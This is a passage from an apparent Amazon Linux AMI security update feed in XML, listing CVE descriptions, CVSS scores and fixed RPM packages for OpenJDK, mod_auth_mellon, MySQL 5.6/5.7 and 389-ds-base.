Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2962 OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690)
1761266:
CVE-2019-2962 OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690)
CVE-2019-2949:
No description is available for this CVE.
99999:
CVE-2019-2949 OpenJDK: Improper handling of Kerberos proxy credentials (Kerberos, 8220302)
CVE-2019-2945:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2945 OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573)
1761596:
CVE-2019-2945 OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2945" title="" id="CVE-2019-2945" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2949" title="" id="CVE-2019-2949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2962" title="" id="CVE-2019-2962" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2964" title="" id="CVE-2019-2964" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2973" title="" id="CVE-2019-2973" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2975" title="" id="CVE-2019-2975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2978" title="" id="CVE-2019-2978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2981" title="" id="CVE-2019-2981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2983" title="" id="CVE-2019-2983" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2987" title="" id="CVE-2019-2987" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2988" title="" id="CVE-2019-2988" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2989" title="" id="CVE-2019-2989" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2992" title="" id="CVE-2019-2992" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2999" title="" id="CVE-2019-2999" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-headless" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.232.b09-0.48.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.232.b09-0.48.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.232.b09-0.48.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.232.b09" release="0.48.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.232.b09-0.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1331</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1331: medium priority package update for mod_auth_mellon mod24_auth_mellon</title><issued date="2020-01-06 23:19:00" /><updated date="2020-01-09 18:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13038:
mod_auth_mellon through 0.14.2 has an Open Redirect via the login?ReturnTo= substring, as demonstrated by omitting the // after http: in the target URL.
99999:
CVE-2019-13038 mod_auth_mellon: an Open Redirect via the login?ReturnTo= substring which could facilitate information theft
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13038" title="" id="CVE-2019-13038" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_auth_mellon" version="0.13.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_auth_mellon-0.13.1-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_auth_mellon-debuginfo" version="0.13.1" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_auth_mellon-debuginfo-0.13.1-1.6.amzn1.x86_64.rpm</filename></package><package name="mod_auth_mellon-debuginfo" version="0.13.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod_auth_mellon-debuginfo-0.13.1-1.6.amzn1.i686.rpm</filename></package><package name="mod_auth_mellon" version="0.13.1" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/mod_auth_mellon-0.13.1-1.6.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.9.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.9.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon" version="0.14.0" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_mellon-0.14.0-2.9.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_mellon-diagnostics" version="0.14.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-diagnostics-0.14.0-2.9.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon-debuginfo" version="0.14.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-debuginfo-0.14.0-2.9.amzn1.i686.rpm</filename></package><package name="mod24_auth_mellon" 
version="0.14.0" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_mellon-0.14.0-2.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1332</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1332: medium priority package update for mysql56</title><issued date="2020-01-06 23:26:00" /><updated date="2020-01-09 18:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2974:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.45 and prior, 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2974 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2019)
CVE-2019-2911:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Information Schema). Supported versions that are affected are 5.6.45 and prior, 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).
99999:
CVE-2019-2911 mysql: Information Schema unspecified vulnerability (CPU Oct 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911" title="" id="CVE-2019-2911" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2974" title="" id="CVE-2019-2974" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.46" 
release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.46" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.46-1.35.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.46" release="1.35.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-errmsg-5.6.46-1.35.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.46" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.46-1.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1333</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1333: medium priority package update for mysql57</title><issued date="2020-01-06 23:27:00" /><updated date="2020-01-09 18:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2993:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: C API). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2993 mysql: Server: C API unspecified vulnerability (CPU Oct 2019)
CVE-2019-2974:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.45 and prior, 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2974 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2019)
CVE-2019-2960:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2960 mysql: Server: Replication unspecified vulnerability (CPU Oct 2019)
CVE-2019-2946:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2946 mysql: Server: PS unspecified vulnerability (CPU Oct 2019)
CVE-2019-2938:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2938 mysql: InnoDB unspecified vulnerability (CPU Oct 2019)
CVE-2019-2914:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
99999:
CVE-2019-2914 mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2019)
CVE-2019-2911:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Information Schema). Supported versions that are affected are 5.6.45 and prior, 5.7.27 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).
99999:
CVE-2019-2911 mysql: Information Schema unspecified vulnerability (CPU Oct 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911" title="" id="CVE-2019-2911" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2914" title="" id="CVE-2019-2914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2938" title="" id="CVE-2019-2938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2946" title="" id="CVE-2019-2946" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2960" title="" id="CVE-2019-2960" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2974" title="" id="CVE-2019-2974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2993" title="" id="CVE-2019-2993" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-libs" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.28" release="1.14.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.28" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.28-1.14.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.28" release="1.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-common-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.28-1.14.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.28" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.28-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1334</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1334: important priority package update for 389-ds-base</title><issued date="2020-01-14 18:03:00" /><updated date="2020-01-15 21:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3883:
It was found that encrypted connections did not honor the &#039;ioblocktimeout&#039; parameter to end blocking requests. As a result, an unauthenticated attacker could repeatedly start a sufficient number of encrypted connections to block all workers, resulting in a denial of service.
In 389-ds-base up to version 1.4.1.2, requests are handled by worker threads. Each socket is waited on by a worker for at most 'ioblocktimeout' seconds. However, this timeout applies only to unencrypted requests. Connections using SSL/TLS do not take this timeout into account during reads and may hang longer. An unauthenticated attacker could repeatedly create hanging LDAP requests to hang all the workers, resulting in a denial of service.
1693612:
CVE-2019-3883 389-ds-base: DoS via hanging secured connections
CVE-2019-14824:
A flaw was found in the 'deref' plugin of 389-ds-base where it could use the 'search' permission to display attribute values. In some configurations, this could allow an authenticated attacker to view private attributes, such as password hashes.
1747448:
CVE-2019-14824 389-ds-base: Read permission check bypass via the deref plugin
CVE-2019-10224:
A flaw has been found in 389-ds-base versions 1.4.x.x before 1.4.1.3. When executed in verbose mode, the dscreate and dsconf commands may display sensitive information, such as the Directory Manager password. An attacker, able to see the screen or record the terminal standard error output, could use this flaw to gain sensitive information.
1677147:
CVE-2019-10224 389-ds-base: using dscreate in verbose mode results in information disclosure
CVE-2018-10871:
389-ds-base before versions 1.3.8.5, 1.4.0.12 is vulnerable to a Cleartext Storage of Sensitive Information. By default, when the Replica and/or retroChangeLog plugins are enabled, 389-ds-base stores passwords in plaintext format in their respective changelog files. An attacker with sufficiently high privileges, such as root or Directory Manager, can query these files in order to retrieve plaintext passwords.
1591480:
CVE-2018-10871 389-ds-base: replication and the Retro Changelog plugin store plaintext password by default
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10871" title="" id="CVE-2018-10871" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10224" title="" id="CVE-2019-10224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14824" title="" id="CVE-2019-14824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3883" title="" id="CVE-2019-3883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.9.1-12.65.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.9.1-12.65.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.9.1" release="12.65.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.9.1-12.65.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.9.1" release="12.65.amzn1" epoch="0" 
